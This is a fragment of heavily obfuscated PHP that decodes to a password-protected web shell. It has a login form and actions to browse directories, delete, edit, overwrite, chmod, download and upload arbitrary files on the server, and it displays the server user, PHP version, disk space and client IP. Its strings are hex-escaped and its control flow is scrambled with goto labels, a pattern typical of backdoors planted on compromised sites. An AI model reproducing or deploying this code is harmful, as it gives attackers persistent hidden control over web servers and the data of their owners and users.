0\x20\40\40\x20\40\40\40\x20\40\x20\x20\x20\40\40\40\56\x6c\x6f\x67\151\x6e\x2d\146\157\162\155\40\x7b\15\12\40\40\x20\40\x20\40\x20\40\40\40\40\x20\x20\x20\40\x20\x20\x20\40\x20\x62\x61\x63\x6b\147\162\x6f\x75\x6e\144\55\143\157\154\157\162\x3a\x20\43\x66\146\x66\73\xd\xa\x20\x20\40\x20\40\x20\40\40\x20\40\40\40\x20\40\x20\x20\x20\40\40\x20\160\x61\x64\x64\x69\x6e\x67\72\x20\62\60\x70\x78\73\15\xa\40\40\40\x20\40\x20\40\40\40\x20\40\x20\40\40\x20\x20\40\40\40\x20\x62\157\162\x64\x65\x72\x2d\162\x61\x64\151\x75\x73\x3a\40\65\160\x78\73\15\xa\x20\x20\x20\x20\x20\40\40\40\40\x20\40\40\x20\40\40\40\x20\x20\x20\x20\x62\157\170\x2d\x73\x68\x61\x64\157\167\72\40\x30\40\x30\40\x31\x30\x70\170\x20\x72\x67\x62\x61\x28\x30\54\x20\x30\x2c\x20\x30\54\40\x30\x2e\61\x29\x3b\xd\xa\40\40\x20\40\x20\40\x20\x20\40\x20\40\x20\40\40\40\x20\175\xd\xa\40\40\x20\40\x20\x20\x20\40\40\x20\x20\40\40\40\x20\x20\56\x6c\157\x67\x69\x6e\55\146\x6f\162\x6d\40\x69\156\x70\165\164\x5b\164\171\x70\145\75\x22\x70\141\x73\x73\167\157\162\144\x22\135\x20\173\xd\xa\40\40\40\x20\40\40\40\x20\40\40\40\40\40\40\x20\x20\40\40\x20\40\x77\151\x64\x74\x68\x3a\40\x31\60\x30\45\x3b\15\xa\40\x20\x20\40\40\40\x20\40\x20\40\x20\40\x20\x20\x20\40\x20\40\40\x20\x70\141\x64\144\151\156\147\x3a\x20\x31\60\x70\x78\73\15\12\40\x20\40\40\x20\x20\x20\40\40\40\40\x20\x20\x20\x20\x20\40\40\x20\x20\x6d\141\x72\x67\151\156\x2d\x62\x6f\x74\164\x6f\x6d\72\x20\61\x30\x70\x78\x3b\xd\12\40\40\x20\x20\x20\40\x20\x20\x20\x20\40\40\x20\40\40\40\175\xd\12\x20\x20\40\40\x20\x20\40\40\x20\40\x20\x20\40\40\40\x20\56\x6c\157\x67\x69\156\x2d\146\157\x72\x6d\x20\x69\x6e\x70\x75\164\133\164\171\160\145\x3d\42\x73\x75\142\x6d\x69\164\x22\x5d\40\x7b\15\12\40\40\40\x20\x20\40\x20\40\x20\40\x20\x20\40\x20\40\40\40\x20\x20\40\x77\x69\144\x74\150\72\40\x31\x30\60\45\x3b\15\xa\x20\40\40\40\40\x20\x20\x20\x20\40\40\40\x20\40\40\40\x20\40\40\x20\x70\x61\x64\144\151\x6e\x67\72\x20\x31\60\160\170\x3b\15\12\40\x20\40\40\x20\40\40\x20\40\x20\x20\x20\40\x20\x20\x20\40\40\x20\x20\142\141\x63\153\x67\162\x6f\165\x6e\x64\x2d\x63\157\154\157\x72\x3a\40\43\60\x30\67\142\146\146\73\15\12\40\x20\x20\x20\40\x20\x20\40\40\40\x20\40\40\x20\x20\40\x20\x20\x20\40\143\157\154\x6f\x72\72\40\43\146\146\x66\73\xd\xa\x20\x20\x20\40\40\40\x20\40\x20\x20\x20\x20\x20\x20\40\x20\x20\40\40\x20\142\x6f\x72\x64\x65\162\72\40\x6e\x6f\x6e\145\73\15\12\x20\40\x20\40\x20\x20\40\x20\x20\x20\40\x20\40\x20\x20\40\40\40\40\x20\x63\x75\x72\163\157\162\x3a\40\x70\157\x69\x6e\x74\145\162\73\xd\12\x20\x20\40\40\x20\x20\40\x20\x20\x20\x20\40\40\40\40\x20\175\xd\xa\40\x20\x20\x20\40\x20\40\40\40\40\x20\x20\40\40\x20\40\56\154\157\x67\x69\156\x2d\x66\157\x72\155\40\x69\x6e\160\x75\164\x5b\x74\171\x70\x65\75\42\163\x75\x62\155\151\x74\x22\x5d\x3a\150\157\x76\x65\162\40\173\15\xa\x20\40\x20\x20\40\x20\40\x20\40\40\x20\40\40\x20\40\40\40\40\x20\40\x62\x61\x63\153\147\x72\x6f\x75\156\x64\x2d\143\157\154\157\x72\72\x20\43\60\60\x35\x36\x62\63\x3b\xd\12\x20\x20\x20\40\40\x20\40\x20\x20\x20\40\40\40\40\x20\40\175\15\12\x20\40\x20\40\40\x20\40\x20\x20\x20\40\40\40\x20\40\x20\56\x6c\x6f\147\151\156\x2d\146\157\x72\x6d\40\56\x65\162\162\x6f\162\x20\x7b\xd\12\x20\x20\x20\x20\x20\40\x20\40\x20\x20\40\40\40\x20\x20\40\40\x20\40\40\143\157\154\157\162\72\x20\43\x66\146\60\x30\60\60\73\15\xa\40\x20\x20\x20\x20\40\40\40\x20\x20\x20\40\40\40\40\x20\x20\40\x20\x20\x6d\141\x72\147\x69\156\55\x62\x6f\164\x74\157\x6d\x3a\x20\61\x30\160\170\x3b\xd\12\40\x20\40\x20\x20\x20\40\40\40\x20\x20\40\40\40\x20\x20\x7d\15\12\40\x20\40\x20\x20\40\40\40\40\40\40\40\74\57\x73\x74\171\x6c\x65\76\15\12\x20\x20\x20\40\40\x20\40\40\74\x2f\150\145\x61\144\76\xd\12\40\x20\x20\40\40\40\x20\40\74\x62\x6f\x64\x79\x3e\xd\12\40\40\40\x20\x20\40\x20\x20\x20\x20\x20\x20\74\144\x69\x76\40\143\154\141\163\163\x3d\42\x6c\157\x67\151\x6e\x2d\146\x6f\x72\x6d\x22\76\15\12\40\x20\40\x20\x20\x20\x20\x20\40\x20\40\x20\40\40\40\40\x3c\150\x32\76\114\157\x67\x69\x6e\74\57\x68\62\x3e\15\12\x20\x20\40\x20\40\40\x20\40\x20\x20\x20\x20\40\40\x20\x20"; goto RIY7C; fNAwr: echo pXHe9($zD_HG * 1024 * 1024 * 1024); goto lzhmn; UhXZd: echo "\74\57\x70\76\15\xa\40\40\40\40\x20\x20\x20\x20\x20\x20\x20\40\x20\x20\x20\x20"; goto Nd4wA; uNb0c: $nUAIJ = dirname($perDG); goto FCCV9; ZIoFE: $sSK9J = phpversion(); goto znCZp; r7oXc: echo $iF8pW; goto xhKtk; SMTet: echo "\x20\40\40\x20\x20\x20\40\x20\x20\40\x20\40\x20\40\40\x20\40\40\40\x20\74\x70\x20\143\x6c\x61\163\163\75\x22\145\x72\x72\157\x72\42\76"; goto jdJjZ; VkOZv: echo htmlspecialchars($sSK9J); goto RyFDK; FCCV9: $oCVXT = explode(DIRECTORY_SEPARATOR, $perDG); goto yiku4; Z3ZLD: $zD_HG = disk_total_space("\57") / (1024 * 1024 * 1024); goto LITEU; Nd4wA: OdrnK: goto WbwAg; peUPW: $jjXM1 = $_SERVER["\125\123\105\122"] ?? "\116\x2f\x41"; goto ZIoFE; Yitd3: echo "\x3c\57\x70\76\15\xa\40\x20\x20\x20\40\40\40\40\x20\40\40\40\x3c\160\x3e\x43\x6c\x69\145\x6e\x74\40\111\x50\x3a\40"; goto yYpUZ; i48D3: echo "\x3c\x2f\160\76\15\12\x20\x20\x20\40\x20\x20\40\40\40\x20\40\40\x3c\x70\x3e\120\110\120\40\126\x65\x72\163\151\x6f\156\72\x20"; goto VkOZv; kFaOy: if (!(!isset($_SESSION["\x6c\x6f\x67\x67\x65\144\137\151\x6e"]) || !$_SESSION["\x6c\157\147\147\145\144\137\x69\x6e"])) { goto tGIVK; } goto kmb7e; jFd6j: $perDG = isset($_GET["\x64\x69\162"]) ? $_GET["\144\x69\x72"] : "\56"; goto JS3Q6; dItts: if (!isset($_POST["\x61\x63\x74\x69\157\x6e"])) { goto VHrrC; } goto vIhYA; qcAZD: switch ($fgaSl) { case "\144\x65\x6c\x65\x74\x65": goto bqEYH; Uy6Xd: unlink($gU8I1); goto p6yRn; oQgxw: I5DSW: goto dBsB0; Yyk0A: lfTPn($gU8I1); goto oQgxw; PBMs2: a0nnR: goto Yyk0A; p6yRn: goto I5DSW; goto PBMs2; dBsB0: goto cl6qQ; goto NyPpY; bqEYH: if (is_dir($gU8I1)) { goto a0nnR; } goto Uy6Xd; NyPpY: case "\x65\144\x69\x74": goto pKVvK; UJUnu: $CJIOq = file_get_contents($gU8I1); goto nLjjB; pKVvK: if (!file_exists($gU8I1)) { goto J7Bdv; } goto UJUnu; nLjjB: J7Bdv: goto XTYuX; XTYuX: goto cl6qQ; goto iG_FK; iG_FK: case "\x73\x61\x76\x65": goto UAVmY; RxdiM: goto cl6qQ; goto g7D1q; UAVmY: if (!(file_exists($gU8I1) && isset($_POST["\143\x6f\156\164\145\x6e\x74"]))) { goto QOt35; } goto Vt4Md; Vt4Md: file_put_contents($gU8I1, $_POST["\x63\x6f\x6e\164\x65\x6e\x74"]); goto qY3wm; qY3wm: QOt35: goto RxdiM; g7D1q: case "\143\150\x6d\x6f\x64": goto ZuojV; bQzAZ: chmod($gU8I1, octdec($_POST["\x70\x65\162\x6d\x69\x73\x73\151\x6f\x6e\x73"])); goto A7sUk; A7sUk: BlX5i: goto v6yIb; ZuojV: if (!isset($_POST["\x70\145\162\x6d\x69\163\x73\x69\x6f\156\163"])) { goto BlX5i; } goto bQzAZ; v6yIb: goto cl6qQ; goto E20so; E20so: case "\x64\157\x77\x6e\154\157\x61\x64": goto cA1Xm; Lty9M: header("\x43\141\x63\x68\145\x2d\103\x6f\x6e\164\162\x6f\x6c\x3a\40\x6d\x75\x73\164\55\x72\145\x76\141\x6c\151\144\x61\x74\145"); goto inGpn; mJ2q4: readfile($gU8I1); goto hd5nZ; c33tk: header("\103\x6f\x6e\x74\x65\x6e\x74\x2d\104\145\x73\x63\162\151\160\x74\151\x6f\x6e\x3a\x20\106\x69\x6c\x65\40\x54\x72\141\x6e\x73\x66\x65\162"); goto MMdsM; SIzVn: tohx7: goto mne6A; NWsa0: header("\105\170\x70\x69\162\145\163\72\x20\x30"); goto Lty9M; hd5nZ: exit; goto SIzVn; MMdsM: header("\x43\157\x6e\164\145\x6e\x74\x2d\x54\x79\x70\x65\72\x20\x61\160\160\x6c\x69\x63\141\x74\151\x6f\x6e\57\x6f\x63\164\x65\x74\x2d\x73\x74\x72\x65\x61\x6d"); goto g3bZ3; mne6A: goto cl6qQ; goto imaLK; inGpn: header("\x50\162\141\x67\155\141\x3a\x20\160\165\x62\154\x69\x63"); goto MYZPQ; MYZPQ: header("\x43\157\156\x74\x65\156\164\55\114\145\156\147\164\150\72\40" . filesize($gU8I1)); goto mJ2q4; g3bZ3: header("\103\157\156\164\x65\156\164\55\x44\x69\163\160\157\163\151\164\x69\x6f\x6e\72\x20\x61\x74\x74\141\143\150\x6d\145\x6e\x74\73\x20\x66\151\154\145\x6e\141\155\x65\x3d" . basename($gU8I1)); goto NWsa0; cA1Xm: if (!file_exists($gU8I1)) { goto tohx7; } goto c33tk; imaLK: case "\165\160\154\157\141\x64": goto DrBx3; vT97M: if (move_uploaded_file($dGUnN["\x74\155\160\137\156\141\155\145"], $cJytr)) { goto wywzm; } goto f1tqa; x0RsR: mrXVq: goto QX7aA; GVnLJ: echo "\74\160\76\x45\162\162\157\x72\40\x75\x70\154\x6f\x61\144\x69\156\x67\x20\146\151\x6c\145\x3a\40" . $dGUnN["\x65\162\162\157\162"] . "\74\x2f\x70\76"; goto PNTsD; VBs6q: bh5bl: goto JNF59; yHMkl: if ($dGUnN["\145\x72\162\157\x72"] === UPLOAD_ERR_OK) { goto mrXVq; } goto GVnLJ; Upw6K: goto cl6qQ; goto NmGDG; QX7aA: $Fdnw8 = basename($dGUnN["\x6e\x61\155\x65"]); goto INFdq; INFdq: $cJytr = $B3_vJ . DIRECTORY_SEPARATOR . $Fdnw8; goto vT97M; f1tqa: echo "\74\x70\76\106\x61\151\154\x65\x64\x20\164\157\40\x6d\157\x76\x65\x20\x75\x70\154\157\141\144\x65\144\40\x66\151\x6c\x65\56\x3c\x2f\160\76"; goto oBoub; PNTsD: goto bh5bl; goto x0RsR; oBoub: goto EVkPs; goto INe7_; JNF59: XJsVM: goto Upw6K; INe7_: wywzm: goto wbSNk; LaPbp: EVkPs: goto VBs6q; DrBx3: if (!isset($_FILES["\x66\151\x6c\x65\x54\157\125\160\x6c\157\141\144"])) { goto XJsVM; } goto s8Sbf; wbSNk: echo "\74\160\x3e\106\x69\x6c\x65\40\x75\160\x6c\x6f\141\144\x65\144\40\x73\165\x63\143\x65\163\x73\146\165\x6c\x6c\171\x21\x3c\x2f\x70\x3e"; goto LaPbp; s8Sbf: $dGUnN = $_FILES["\x66\x69\154\145\124\157\x55\x70\154\157\141\x64"]; goto yHMkl; NmGDG: } goto gGETl; KnI08: VHrrC: goto QAmvF; Wmp74: echo htmlspecialchars($NsF6s); goto m2gRw; znCZp: $NsF6s = date("\x59\55\x6d\55\144\40\x48\72\151\72\x73"); goto LDu2n; lzhmn: echo "\x3c\x2f\x70\x3e\xd\xa\40\x20\x20\40\x20\x20\x20\40\x3c\x2f\144\x69\x76\x3e\xd\xa\xd\xa\40\40\40\40\40\x20\40\40\74\144\x69\166\40\143\154\141\163\163\75\42\141\x63\164\151\157\156\x73\42\76\xd\12\40\40\x20\x20\40\40\40\40\x20\40\x20\x20"; goto jd6iW; oOe_D: $yz45q = get_current_user(); goto peUPW; yNPNV: echo "\x20\40\x20\x20\74\57\x64\x69\x76\76\15\xa\74\57\142\x6f\x64\x79\76\15\12\x3c\57\150\164\155\x6c\x3e"; ?>